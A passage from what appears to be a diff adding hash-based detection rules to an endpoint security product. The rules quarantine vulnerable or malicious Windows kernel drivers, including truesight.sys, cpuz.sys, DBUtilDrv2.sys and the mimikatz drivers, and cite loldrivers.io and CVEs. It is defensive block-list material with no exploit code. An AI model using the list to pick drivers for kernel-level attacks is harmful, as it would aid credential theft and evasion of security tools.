+ "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973484Z", + "creation_date": "2026-03-23T11:45:29.973486Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973491Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0909005d625866ef8ccd8ae8af5745a469f4f70561b644d6e38b80bccb53eb06", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"fdd86998-51c5-5955-adf1-85747cf9dfc9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823755Z", + "creation_date": "2026-03-23T11:45:30.823757Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823762Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3a3c92951a3675d38186e33dd186c4df05214d1c7814b4e81201c043feb0c6e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fddca3ea-f400-52b5-a7a2-ccea4335da76", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150251Z", + "creation_date": "2026-03-23T11:45:31.150253Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.150259Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "679a104a53ca0707f98f46308069c5d3bbf625ef008e75b2c01993dee6e54cb7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fddecbd7-a621-5813-a01c-14e7fffa138f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479548Z", + "creation_date": "2026-03-23T11:45:30.479550Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479555Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29d765e29d2f06eb511ee88b2e514c9df1a9020a768ddd3d2278d9045e9cdb4a", + "comment": "Malicious Kernel Driver (aka e939448b28a4edc81f1f974cebf6e7d2.sys) [https://www.loldrivers.io/drivers/4f2edf45-b135-404f-bedc-9583f0bae574/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fde3043b-6bf5-5510-b834-d627dfa375ae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983738Z", + "creation_date": "2026-03-23T11:45:29.983740Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983745Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d3d601c77d4bb367ab3105920ca8435aa775448a49c1eda6ac6f46ee5d8709cb", + "comment": "Vulnerable Kernel Driver (aka AsrAutoChkUpdDrv.sys) [https://www.loldrivers.io/drivers/b72f7335-6f27-42c5-85f5-ed7eb9016eac/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fde5dd99-4ef2-5dc6-ab7d-395aeffb899c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148962Z", + "creation_date": "2026-03-23T11:45:31.148964Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148970Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"f060130fad8cc5f7ca388801f6d42a3cae26e19841aad9e5d944e79e6f7e288d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fde666b5-832d-5130-b6fa-10651df90bc6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809569Z", + "creation_date": "2026-03-23T11:45:31.809572Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809580Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c13eff9d6aeb9458902878207e6224d0f31f30d05fd83aa654add43219a33084", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fdeb7371-86a2-515c-92f8-ce7608e295f1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808576Z", + "creation_date": "2026-03-23T11:45:31.808579Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808584Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e5edc5325e00f7aa95e4f6f698962f86d9378ff8c3604c52b6bf6d354a75f155", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fdf439b8-c973-560b-99f3-f71dafc19335", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465368Z", + "creation_date": "2026-03-23T11:45:30.465372Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465381Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "51805bb537befaac8ce28f2221624cb4d9cefdc0260bc1afd5e0bc97bf1f9f93", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fdf9b4e3-740a-5d28-83f9-fe7a1ec72a0c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479206Z", + "creation_date": "2026-03-23T11:45:31.479209Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479220Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c621ad6afe87288d22cc0f34671d45715b92ef31d7d39fd79188a706b9da12f2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe035dec-a880-51c1-873b-f05d2505befc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826233Z", + "creation_date": 
"2026-03-23T11:45:31.826235Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826241Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "775084db4927dc7a387096c4ce6adf7720d56520700c55d0ca373a16ee7c654a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe0c8695-8153-5452-bbcc-008544e11cfa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814287Z", + "creation_date": "2026-03-23T11:45:31.814290Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814299Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6d8975092b4a8b643af5bd04fd5973e74607ad44fa274ad0d12d8051228db039", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "fe0e7ebe-fe57-5e8c-b036-0dc9a25c7417", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474005Z", + "creation_date": "2026-03-23T11:45:30.474008Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474017Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88671ef30520d11a63a4cb3acf6b1c827c82acced657baa8f371034957ddf825", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe0fe43b-69b1-58d6-bcce-ed2452f59aaf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827561Z", + "creation_date": "2026-03-23T11:45:30.827563Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.827568Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "854ed66189aafb979aaafc60d03a58e5b96e08c6345183bfc06ac27dbb832053", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe1a336f-5f83-5860-be4b-9fb4dd26d57d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143042Z", + "creation_date": "2026-03-23T11:45:31.143044Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143049Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a83762324a1e0d224566b083cd808f582c4e04bc99e02b6e418bda23a12db25", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe20c382-5062-50a5-91b5-6570ab004878", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617643Z", + "creation_date": "2026-03-23T11:45:29.617645Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617651Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9b8ecd0657fda14476920fe47783bd8a951d7a4a640935d9199b4a7ae4b8b69", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe236022-89b6-54e2-b97d-17b3a3c238c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983299Z", + "creation_date": "2026-03-23T11:45:29.983301Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983306Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "462cd6db3c0be714dd751466d5871c111812faf392c468c81a88cb0da4783458", + "comment": "Vulnerable Kernel Driver (aka DBUtilDrv2.sys) [https://www.loldrivers.io/drivers/bb808089-5857-4df2-8998-753a7106cb44/,https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe251034-4ba0-5d27-80b0-ad8dfa72eab1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610300Z", + "creation_date": "2026-03-23T11:45:29.610302Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610308Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2101d5e80e92c55ecfd8c24fcf2202a206a4fd70195a1378f88c4cc04d336f22", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe34b5db-ba0a-5877-b632-98bcac0e3316", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151986Z", + "creation_date": "2026-03-23T11:45:31.151988Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0f6e476d42dabffd178a622805677695a9f077497964e37121940ef145528ff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe357f21-9829-588a-b0e4-bbbcc1db9019", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146902Z", + "creation_date": "2026-03-23T11:45:32.146905Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146910Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "015956494226d4cbb89283c7b915a46353670c7d41e02f0f2ba741c0d2c73615", + "comment": "Vulnerable Kernel Driver (aka 
BioNTdrv.sys) [https://www.loldrivers.io/drivers/e6378671-986d-42a1-8e7a-717117c83751/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe365c9b-2965-5ddc-9d30-93e2e3aba9a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468555Z", + "creation_date": "2026-03-23T11:45:30.468558Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468567Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13999eb266b759e879816fdab640d59ef9e35e2ea61575810979d9eb22fdfd4d", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe45c1ce-334b-55e6-9f47-ef3ff75a2086", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822336Z", + "creation_date": "2026-03-23T11:45:30.822338Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822343Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3eea0723a9007f5a85382cd2e92d9f9cc94bb9e2f7fbb6d99a7c70c8527caa5a", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe45ebae-252b-545b-9470-2615b6528b89", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478076Z", + "creation_date": "2026-03-23T11:45:31.478080Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478107Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4f41710a76004fde6747989dab3cc4ec3cde19e40499b7210b67c83c69fae2fe", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe49018c-40a5-5bb7-9552-13a7f405aac2", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462057Z", + "creation_date": "2026-03-23T11:45:30.462060Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462069Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "083a311875173f8c4653e9bbbabb689d14aa86b852e7fa9f5512fc60e0fd2c43", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fe52c3fd-5f98-5a15-997b-fdff7abb212a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622402Z", + "creation_date": "2026-03-23T11:45:29.622404Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622409Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
